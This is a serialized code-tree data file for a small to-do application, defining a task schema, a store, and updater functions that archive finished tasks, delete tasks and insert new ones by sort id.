|T $ {} (:text |def) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJo8f59cJArZ)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B13If95qyCSZ)
|r $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:done-time) (:type :leaf) (:at 1525887098055) (:by |root) (:id |HJ4ue3e0Gleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1525887087063) (:by |root) (:id |rylD_g3lCG)
:type :expr
:at 1525887083686
:by |root
:id |HJ4ue3e0G
|yj $ {}
:data $ {}
|T $ {} (:text |:archived-time) (:type :leaf) (:at 1525887094357) (:by |root) (:id |B1xKdxhl0fleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1525887094890) (:by |root) (:id |Sy8Adg3gAG)
:type :expr
:at 1525887088907
:by |root
:id |B1xKdxhl0f
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJAUf9qqkRHW)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bklvf5c9JAHZ)
|j $ {} (:text |nil) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyZPz5q9JASW)
:type :expr
:at 1500452996813
:by nil
:id |SyyPMc5qJASW
|r $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkXvzc55yABb)
|j $ {} (:text ||) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1Vwzq551CrW)
:type :expr
:at 1500452996813
:by nil
:id |ryMDz5qc10r-
|v $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1UDf9q9JCBW)
|j $ {} (:text |false) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJwvzq5qJRBW)
:type :expr
:at 1500452996813
:by nil
:id |Skrwfcc5kRHW
|x $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019264312) (:by |root) (:id |H11Ibs_LMleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1518018896949) (:by |root) (:id |Bkd8-juUG)
:type :expr
:at 1518018886693
:by |root
:id |H11Ibs_LM
|y $ {}
:data $ {}
|T $ {} (:text |:created-time) (:type :leaf) (:at 1525887081583) (:by |root) (:id |SknPxneAMleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1525887082472) (:by |root) (:id |BJxzde3gAG)
:type :expr
:at 1525887075824
:by |root
:id |SknPxneAM
:type :expr
:at 1500452996813
:by nil
:id |rkTIGqcckRHW
:type :expr
:at 1500452996813
:by nil
:id |B1cUGqqcy0SW
|store $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SytwG9c5yCr-)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H19vz555yCrb)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r13DM55qJASW)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyADG99qk0Sb)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1518019220789) (:by |root) (:id |Byl_G99510rZ)
|j $ {}
:data $ {}
|D $ {} (:text "|\"root") (:type :leaf) (:at 1553789969986) (:by |root) (:id |HkgGoGiO8M)
|T $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyMOMc9qJRBb)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkXuf9c9JCHZ)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyHuG9c91Ar-)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SywOM9qqJCB-)
|j $ {} (:text ||root) (:type :leaf) (:at 1518020119145) (:by |root) (:id |B1ddGqqcJ0H-)
:type :expr
:at 1500452996813
:by nil
:id |BJI_z5q5y0H-
|r $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S19_fc5c1Ar-)
|j $ {} (:text ||) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HysdM99qyRHZ)
:type :expr
:at 1500452996813
:by nil
:id |ByFdzc95yCr-
|v $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019251207) (:by |root) (:id |Skg2oGjuUMleaf)
|j $ {} (:text |mid-id) (:type :leaf) (:at 1518019256019) (:by |root) (:id |S1Tnzs_Lz)
:type :expr
:at 1518019236084
:by |root
:id |Skg2oGjuUM
:type :expr
:at 1500452996813
:by nil
:id |BkEdMq9qyABZ
:type :expr
:at 1500452996813
:by nil
:id |SJ-uf5qqk0SW
:type :expr
:at 1518019225604
:by |root
:id |SkfsGouIG
:type :expr
:at 1500452996813
:by nil
:id |B11OGcqckRrZ
:type :expr
:at 1500452996813
:by nil
:id |HkpvGqq51RSW
|r $ {}
:data $ {}
|T $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1a_zqqckRSZ)
|j $ {} (:text |0) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1AOMccqkCrW)
:type :expr
:at 1500452996813
:by nil
:id |Sk2dGcqcJ0BZ
|u $ {}
:data $ {}
|T $ {} (:text |:dragging-id) (:type :leaf) (:at 1518169577977) (:by |root) (:id |BJgZkCyj8Mleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1518169563984) (:by |root) (:id |rJXX1R1sIM)
:type :expr
:at 1518169561229
:by |root
:id |BJgZkCyj8M
|v $ {}
:data $ {}
|T $ {} (:text |:dropping-id) (:type :leaf) (:at 1519749432753) (:by |root) (:id |Hy1rtb7OGleaf)
|j $ {} (:text |nil) (:type :leaf) (:at 1519749433304) (:by |root) (:id |BkZ-rF-mOf)
:type :expr
:at 1519749430672
:by |root
:id |Hy1rtb7OG
|x $ {}
:data $ {}
|T $ {} (:text |:states) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ7Kz55cy0HZ)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SySFG9qcy0rb)
:type :expr
:at 1500452996813
:by nil
:id |BJEKfc5c10rZ
:type :expr
:at 1500452996813
:by nil
:id |BkztMqc5yRHW
|y $ {}
:data $ {}
|T $ {} (:text |:archives) (:type :leaf) (:at 1525625984494) (:by |root) (:id |rkUKN226Gleaf)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525625985128) (:by |root) (:id |B1YtVhhaz)
:type :expr
:at 1525625984841
:by |root
:id |HJxYYE22pz
:type :expr
:at 1525625981566
:by |root
:id |rkUKN226G
:type :expr
:at 1500452996813
:by nil
:id |rkowMcq9yCr-
:type :expr
:at 1500452996813
:by nil
:id |rydPz95510rZ
:proc $ {}
:data $ {}
:type :expr
:at 1500452996813
:by nil
:id |ryK8M5991CrW
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1wUMc9qJ0SZ)
|j $ {} (:text |app.schema) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyO8fc55JCHW)
|r $ {}
:data $ {}
|T $ {} (:text |:require) (:type :leaf) (:at 1518017850047) (:by |root) (:id |Sk-AE6cO8f)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518017852715) (:by |root) (:id |rJMGrpc_If)
|j $ {} (:text |bisection-key.core) (:type :leaf) (:at 1518017863088) (:by |root) (:id |SyZSBp9_IM)
|r $ {} (:text |:refer) (:type :leaf) (:at 1518017864572) (:by |root) (:id |BJm18T5OIG)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518017866004) (:by |root) (:id |rke-8TcdUz)
|j $ {} (:text |mid-id) (:type :leaf) (:at 1518019044262) (:by |root) (:id |rJ7GI69_LM)
:type :expr
:at 1518017864903
:by |root
:id |SyZ-U69dLz
:type :expr
:at 1518017850303
:by |root
:id |rJXfr6cOLf
:type :expr
:at 1518017846974
:by |root
:id |rJkHp5_Iz
:type :expr
:at 1500452996813
:by nil
:id |rkUUzq991CBZ
|app.updater $ {}
:defs $ {}
|relax-tasks $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1508858088270) (:by |root) (:id |r1bllKCnpb)
|j $ {} (:text |relax-tasks) (:type :leaf) (:at 1508858088270) (:by |root) (:id |SkzeeK026Z)
|n $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1508858105870) (:by |root) (:id |rJlbZYRhp-)
|b $ {} (:text |op-id) (:type :leaf) (:at 1525887642273) (:by |root) (:id |Hyg-oG2xRG)
|j $ {} (:text |op-time) (:type :leaf) (:at 1525887371923) (:by |root) (:id |Sym9b3g0M)
:type :expr
:at 1508858104394
:by |root
:id |Hk-g-KA3ab
|r $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1525626447580) (:by |root) (:id |r1ZPLIn2az)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |done-tasks) (:type :leaf) (:at 1525626455228) (:by |root) (:id |SkxdII336M)
|j $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629051868191) (:by |Qr5ffqtY) (:id |rJZvU3naz)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1525626520340) (:by |root) (:id |Bkl7vI2haG)
|j $ {} (:text |store) (:type :leaf) (:at 1525626521929) (:by |root) (:id |SJWoLhhTG)
:type :expr
:at 1525626516620
:by |root
:id |r1Tq8h26M
|r $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1525626462974) (:by |root) (:id |HyIwL23pG)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1525626463872) (:by |root) (:id |SkQDvUnnaf)
|j $ {}
:data $ {}
|T $ {} (:text |pair) (:type :leaf) (:at 1629051881897) (:by |Qr5ffqtY)
:type :expr
:at 1525626466188
:by |root
:id |rkcwIhnaG
|r $ {}
:data $ {}
|D $ {} (:text |let[]) (:type :leaf) (:at 1629051871873) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|j $ {} (:text |task-id) (:type :leaf) (:at 1629051875762) (:by |Qr5ffqtY)
|r $ {} (:text |task) (:type :leaf) (:at 1629051875762) (:by |Qr5ffqtY)
:type :expr
:at 1629051875762
:by |Qr5ffqtY
|P $ {} (:text |pair) (:type :leaf) (:at 1629051877025) (:by |Qr5ffqtY)
|T $ {}
:data $ {}
|D $ {} (:text |and) (:type :leaf) (:at 1525887821262) (:by |root) (:id |rJb48Q3eRG)
|T $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1525626472994) (:by |root) (:id |ryxRDU2h6Gleaf)
|j $ {} (:text |task) (:type :leaf) (:at 1525626473761) (:by |root) (:id |Hk7-uUn2pz)
:type :expr
:at 1525626470297
:by |root
:id |ryxRDU2h6G
|j $ {}
:data $ {}
|T $ {} (:text |not) (:type :leaf) (:at 1525887823947) (:by |root) (:id |SyeII72xRf)
|j $ {}
:data $ {}
|T $ {} (:text |.blank?) (:type :leaf) (:at 1629051922937) (:by |Qr5ffqtY) (:id |By0LQhxAG)
|j $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1525887841133) (:by |root) (:id |r1g8D7hxCG)
|j $ {} (:text |task) (:type :leaf) (:at 1525887842416) (:by |root) (:id |rygFPm3g0f)
:type :expr
:at 1525887838885
:by |root
:id |B1PDXne0z
:type :expr
:at 1525887833892
:by |root
:id |rJzDmheRM
:type :expr
:at 1525887822559
:by |root
:id |HkDU72xCG
:type :expr
:at 1525887819761
:by |root
:id |r1lNImhg0M
:type :expr
:at 1629051870060
:by |Qr5ffqtY
:type :expr
:at 1525626464183
:by |root
:id |Byb_vInhpf
:type :expr
:at 1525626463135
:by |root
:id |r1zDwUn2TG
|t $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1525887261484) (:by |root) (:id |HkEmWnlRzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1525887262827) (:by |root) (:id |ByUm-nxRM)
|j $ {}
:data $ {}
|T $ {} (:text |pair) (:type :leaf) (:at 1629051897807) (:by |Qr5ffqtY)
:type :expr
:at 1525887263155
:by |root
:id |r1mDmWhg0M
|r $ {}
:data $ {}
|D $ {} (:text |let[]) (:type :leaf) (:at 1629051887306) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|j $ {} (:text |task-id) (:type :leaf) (:at 1629051890698) (:by |Qr5ffqtY)
|r $ {} (:text |task) (:type :leaf) (:at 1629051890698) (:by |Qr5ffqtY)
:type :expr
:at 1629051890698
:by |Qr5ffqtY
|P $ {} (:text |pair) (:type :leaf) (:at 1629051892578) (:by |Qr5ffqtY)
|T $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1525887269929) (:by |root) (:id |B1WaXb2lAzleaf)
|j $ {} (:text |task-id) (:type :leaf) (:at 1525887271262) (:by |root) (:id |S1WRQbnl0f)
|r $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1525887273751) (:by |root) (:id |BJrk4Z3gAM)
|j $ {} (:text |task) (:type :leaf) (:at 1525887274909) (:by |root) (:id |rJWM4ZhxRG)
|r $ {} (:text |:archived-time) (:type :leaf) (:at 1525887280418) (:by |root) (:id |SJQ7NbngAG)
|v $ {} (:text |op-time) (:type :leaf) (:at 1525887282176) (:by |root) (:id |SyYV-2g0G)
:type :expr
:at 1525887272732
:by |root
:id |rybNW2eAM
:type :expr
:at 1525887269233
:by |root
:id |B1WaXb2lAz
:type :expr
:at 1629051884910
:by |Qr5ffqtY
:type :expr
:at 1525887262530
:by |root
:id |rJPX-3eAf
:type :expr
:at 1525887260512
:by |root
:id |ByW7QfneAM
:type :expr
:at 1525626457287
:by |root
:id |HkgWP8nnTz
:type :expr
:at 1525626448148
:by |root
:id |SkMd88n3TM
:type :expr
:at 1525626447817
:by |root
:id |rJ-O8Uhn6M
|T $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1508858096997) (:by |root) (:id |B1-kdR2p-leaf)
|b $ {} (:text |store) (:type :leaf) (:at 1508858097754) (:by |root) (:id |BkZKlYAnaW)
|j $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1508857850496) (:by |root) (:id |SyBkuRhTb)
|r $ {} (:text |:tasks) (:type :leaf) (:at 1508857857274) (:by |root) (:id |HkY-dA2T-)
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1508857857943) (:by |root) (:id |r1IY-OA3TZ)
|j $ {}
:data $ {}
|T $ {} (:text |tasks) (:type :leaf) (:at 1508857858958) (:by |root) (:id |SJzqZd036b)
:type :expr
:at 1508857858215
:by |root
:id |rJQcZu03aW
|r $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1508857970332) (:by |root) (:id |HycudRn6b)
|T $ {}
:data $ {}
|T $ {}
:data $ {}
|D $ {} (:text |next-tasks) (:type :leaf) (:at 1508857975504) (:by |root) (:id |r16OOAhT-)
|L $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1629051903544) (:by |Qr5ffqtY) (:id |ByqCenuIG)
|L $ {} (:text |tasks) (:type :leaf) (:at 1518022868238) (:by |root) (:id |S1GsRen_8M)
|T $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1518022818085) (:by |root) (:id |ByxOjg2_Lz)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518022818693) (:by |root) (:id |SkNqoxnuUf)
|j $ {}
:data $ {}
|T $ {} (:text |pair) (:type :leaf) (:at 1629051913284) (:by |Qr5ffqtY)
:type :expr
:at 1518022819779
:by |root
:id |r13jghdUz
|r $ {}
:data $ {}
|D $ {} (:text |not) (:type :leaf) (:at 1518022841283) (:by |root) (:id |SJlWaghOUz)
|T $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1518022838773) (:by |root) (:id |rJj3g3u8Mleaf)
|j $ {}
:data $ {}
|D $ {} (:text |last) (:type :leaf) (:at 1629051915129) (:by |Qr5ffqtY)
|T $ {} (:text |pair) (:type :leaf) (:at 1629052260342) (:by |Qr5ffqtY) (:id |HJ7J6e3uIf)
:type :expr
:at 1629051914116
:by |Qr5ffqtY
:type :expr
:at 1518022834805
:by |root
:id |rJj3g3u8M
:type :expr
:at 1518022840672
:by |root
:id |S12Te3d8M
:type :expr
:at 1518022818316
:by |root
:id |rJScsx3_IM
:type :expr
:at 1518022816209
:by |root
:id |HkZdixh_Lf
:type :expr
:at 1518022865445
:by |root
:id |SkxKAxnu8G
:type :expr
:at 1508857971960
:by |root
:id |Hkl2udRn6Z
:type :expr
:at 1508857971685
:by |root
:id |BknudCnTZ
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1508857977846) (:by |root) (:id |rJxZYO03a-leaf)
|j $ {}
:data $ {}
|T $ {} (:text |empty?) (:type :leaf) (:at 1508857981044) (:by |root) (:id |SkWzFuAnpZ)
|j $ {} (:text |next-tasks) (:type :leaf) (:at 1508857983847) (:by |root) (:id |SkbSK_CnTW)
:type :expr
:at 1508857980691
:by |root
:id |B1BKd02aZ
|t $ {}
:data $ {}
|D $ {} (:text |assoc) (:type :leaf) (:at 1525887653754) (:by |root) (:id |ryepof2gAz)
|T $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525887620383) (:by |root) (:id |ByiYzhgRMleaf)
:type :expr
:at 1525887619168
:by |root
:id |ByiYzhgRM
|j $ {} (:text |op-id) (:type :leaf) (:at 1525887656146) (:by |root) (:id |BkXRif2eRz)
|r $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1525887657945) (:by |root) (:id |HyEe3GheAG)
|j $ {} (:text |schema/task) (:type :leaf) (:at 1525887659391) (:by |root) (:id |SkVf3z2xCf)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525887660408) (:by |root) (:id |rkE2MhgAG)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1525887661754) (:by |root) (:id |HJ742MneCz)
|j $ {} (:text |op-id) (:type :leaf) (:at 1525887662472) (:by |root) (:id |BJZU3MhgCf)
:type :expr
:at 1525887660642
:by |root
:id |BkSnzhgRf
|r $ {}
:data $ {}
|T $ {} (:text |:created-time) (:type :leaf) (:at 1525887666217) (:by |root) (:id |r1evnMhxRzleaf)
|j $ {} (:text |op-time) (:type :leaf) (:at 1525887668034) (:by |root) (:id |Sks3fhgRz)
:type :expr
:at 1525887663346
:by |root
:id |r1evnMhxRz
|v $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1631341543924) (:by |Qr5ffqtY)
|j $ {} (:text |mid-id) (:type :leaf) (:at 1631341579758) (:by |Qr5ffqtY)
:type :expr
:at 1631341539893
:by |Qr5ffqtY
:type :expr
:at 1525887660128
:by |root
:id |S1gNhzngAz
:type :expr
:at 1525887656390
:by |root
:id |SJSl3G3eAf
:type :expr
:at 1525887652610
:by |root
:id |ByTifngCz
|v $ {} (:text |next-tasks) (:type :leaf) (:at 1508858041802) (:by |root) (:id |S1efsdAnaZ)
:type :expr
:at 1508857976784
:by |root
:id |rJxZYO03a-
:type :expr
:at 1508857969375
:by |root
:id |BklYd_RhT-
:type :expr
:at 1508857857600
:by |root
:id |H15-dRhaW
:type :expr
:at 1508857821347
:by |root
:id |SJgHku02Tb
|n $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1525626486156) (:by |root) (:id |SklnuIn2pGleaf)
|j $ {} (:text |:archives) (:type :leaf) (:at 1525626494509) (:by |root) (:id |SykKInn6M)
|r $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1525626497393) (:by |root) (:id |r1uYU3h6G)
|j $ {}
:data $ {}
|T $ {} (:text |archives) (:type :leaf) (:at 1525626499653) (:by |root) (:id |HJ9YU2h6f)
:type :expr
:at 1525626497633
:by |root
:id |r1ecKU32aG
|r $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1525626501128) (:by |root) (:id |SkZnKIhnTMleaf)
|j $ {} (:text |archives) (:type :leaf) (:at 1525626503294) (:by |root) (:id |BJ0tLn3pG)
|r $ {} (:text |done-tasks) (:type :leaf) (:at 1525626505501) (:by |root) (:id |Byg9LhnpG)
:type :expr
:at 1525626500449
:by |root
:id |SkZnKIhnTM
:type :expr
:at 1525626496172
:by |root
:id |H1edFL2npz
:type :expr
:at 1525626484507
:by |root
:id |SklnuIn2pG
|r $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1508858065544) (:by |root) (:id |r1ewCuAnpWleaf)
|r $ {} (:text |:pointer) (:type :leaf) (:at 1508858067324) (:by |root) (:id |ryI9AuC2T-)
|v $ {} (:text |0) (:type :leaf) (:at 1508858067990) (:by |root) (:id |rJhCOR3aZ)
:type :expr
:at 1508858063384
:by |root
:id |r1ewCuAnpW
:type :expr
:at 1508857816526
:by |root
:id |HJeGgFR26-
:type :expr
:at 1525626446878
:by |root
:id |rklDI823pz
:type :expr
:at 1508858088270
:by |root
:id |HylexF02aZ
|delete-task $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B19hUc9510B-)
|j $ {} (:text |delete-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryi3895qJArZ)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H163I9qcJCBb)
|j $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1A2Lq9q1Arb)
:type :expr
:at 1500452996813
:by nil
:id |S1n3Iqcc1CSW
|v $ {}
:data $ {}
|D $ {} (:text |let-sugar) (:type :leaf) (:at 1629051935497) (:by |Qr5ffqtY) (:id |SyfChvsOUf)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1518020593426) (:by |root) (:id |BkFx_idIM)
|T $ {} (:text |task-id) (:type :leaf) (:at 1518020537067) (:by |root) (:id |rJGkaDiOLf)
|j $ {} (:text |idx) (:type :leaf) (:at 1518020594956) (:by |root) (:id |BJeqldoOIz)
:type :expr
:at 1518020592424
:by |root
:id |BkxueOjdUz
|j $ {} (:text |op-data) (:type :leaf) (:at 1518020538251) (:by |root) (:id |HyG-6PsOUG)
:type :expr
:at 1518020535335
:by |root
:id |SJNy6Pj_8M
:type :expr
:at 1518020535177
:by |root
:id |ByQ1pvo_Uz
|T $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJZ6Lqcck0HZ)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1mpL9cckCSb)
|j $ {} (:text |1) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ46I55q10S-)
|r $ {}
:data $ {}
|T $ {} (:text |count) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1UTU9ccyCrb)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJd6UqccJ0rb)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1taU9c5JCHW)
:type :expr
:at 1500452996813
:by nil
:id |SJPaL9q5kCrb
:type :expr
:at 1500452996813
:by nil
:id |SyB6Uqqq1ArW
:type :expr
:at 1500452996813
:by nil
:id |rkM6I595yRB-
|r $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1qp8c5qyAHW)
|v $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1518020604151) (:by |root) (:id |B17bOjuIz)
|L $ {} (:text |store) (:type :leaf) (:at 1518020610178) (:by |root) (:id |r1LZ_jOLG)
|T $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1518020556827) (:by |root) (:id |HkgvaPo_8G)
|r $ {} (:text |:tasks) (:type :leaf) (:at 1518020554740) (:by |root) (:id |rJxeCPid8z)
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518020559782) (:by |root) (:id |H1IAwjuIG)
|j $ {}
:data $ {}
|T $ {} (:text |tasks) (:type :leaf) (:at 1518020560587) (:by |root) (:id |H1gOAwj_Lf)
:type :expr
:at 1518020560042
:by |root
:id |HJWORvodLM
|r $ {}
:data $ {}
|T $ {} (:text |dissoc) (:type :leaf) (:at 1518020562075) (:by |root) (:id |rk-KAvsOLzleaf)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518020563368) (:by |root) (:id |BkQ5ADjuUz)
|r $ {} (:text |task-id) (:type :leaf) (:at 1518020564911) (:by |root) (:id |Bk2Awsd8z)
:type :expr
:at 1518020561063
:by |root
:id |rk-KAvsOLz
:type :expr
:at 1518020558323
:by |root
:id |rkeL0wouIM
:type :expr
:at 1518020543324
:by |root
:id |Sk-PTPjuLf
|j $ {}
:data $ {}
|T $ {} (:text |update) (:type :leaf) (:at 1518020613075) (:by |root) (:id |B1ejZOidIMleaf)
|j $ {} (:text |:pointer) (:type :leaf) (:at 1518020615894) (:by |root) (:id |ByWaWOsd8f)
|r $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518020616473) (:by |root) (:id |S14lG_sOLG)
|j $ {}
:data $ {}
|T $ {} (:text |pointer) (:type :leaf) (:at 1518020617809) (:by |root) (:id |ry-Gdo_IM)
:type :expr
:at 1518020616783
:by |root
:id |rye-fuju8G
|r $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1518020618701) (:by |root) (:id |rJEMzuodIfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1629052304507) (:by |Qr5ffqtY) (:id |S1bQMOsuUM)
|b $ {} (:text |0) (:type :leaf) (:at 1629052305940) (:by |Qr5ffqtY)
|j $ {} (:text |idx) (:type :leaf) (:at 1518020623170) (:by |root) (:id |BylUz_ouUG)
:type :expr
:at 1518020621399
:by |root
:id |SkWSfOjOUf
|r $ {} (:text |0) (:type :leaf) (:at 1518020627615) (:by |root) (:id |SyluMdi_If)
|v $ {}
:data $ {}
|T $ {} (:text |dec) (:type :leaf) (:at 1518020630432) (:by |root) (:id |HyAMdsuUM)
|j $ {} (:text |pointer) (:type :leaf) (:at 1518020631393) (:by |root) (:id |rkJXuiO8z)
:type :expr
:at 1518020629938
:by |root
:id |rJeAGdsuIf
:type :expr
:at 1518020618196
:by |root
:id |rJEMzuodIf
:type :expr
:at 1518020616139
:by |root
:id |H1reGOjd8z
:type :expr
:at 1518020610928
:by |root
:id |B1ejZOidIM
:type :expr
:at 1518020602438
:by |root
:id |Sy-GZdsu8G
:type :expr
:at 1500452996813
:by nil
:id |ryl6UqcckRr-
:type :expr
:at 1518020534026
:by |root
:id |SyWChDjOIz
:type :expr
:at 1500452996813
:by nil
:id |HyK3Ic59JAHW
|add-after $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJtkU9ccJASb)
|j $ {} (:text |add-after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Syq1U5551Crb)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H12kI5ccJABb)
|j $ {} (:text |task-id) (:type :leaf) (:at 1518019749908) (:by |root) (:id |HkT1I55qyRH-)
|r $ {} (:text |op-id) (:type :leaf) (:at 1518019947530) (:by |root) (:id |S1Ak85cqyCr-)
|v $ {} (:text |op-time) (:type :leaf) (:at 1525887423326) (:by |root) (:id |rkl8p-hgAG)
:type :expr
:at 1500452996813
:by nil
:id |BJsy895cJCSZ
|v $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1518019759620) (:by |root) (:id |SJ-Pn4jdUM)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |base-task) (:type :leaf) (:at 1518019765438) (:by |root) (:id |r1-_2Eo_8G)
|j $ {}
:data $ {}
|T $ {} (:text |get-in) (:type :leaf) (:at 1518019767065) (:by |root) (:id |BJCh4odIG)
|j $ {} (:text |store) (:type :leaf) (:at 1518019769683) (:by |root) (:id |BkfJaEo_8M)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518019770168) (:by |root) (:id |r1GMTVsOUM)
|j $ {} (:text |:tasks) (:type :leaf) (:at 1518019771006) (:by |root) (:id |ByLMpVsu8f)
|r $ {} (:text |task-id) (:type :leaf) (:at 1518019773290) (:by |root) (:id |rk4pEoOUz)
:type :expr
:at 1518019769925
:by |root
:id |By7zpEoOLG
:type :expr
:at 1518019765902
:by |root
:id |rJxAn4suLz
:type :expr
:at 1518019760187
:by |root
:id |H1XOhVi_Lz
|j $ {}
:data $ {}
|T $ {} (:text |base-sort-id) (:type :leaf) (:at 1518019779167) (:by |root) (:id |HJPp4j_8zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019781989) (:by |root) (:id |HkGsTNj_Iz)
|j $ {} (:text |base-task) (:type :leaf) (:at 1518019783682) (:by |root) (:id |rJf0TEsOIG)
:type :expr
:at 1518019779492
:by |root
:id |B1mjTVo_UM
:type :expr
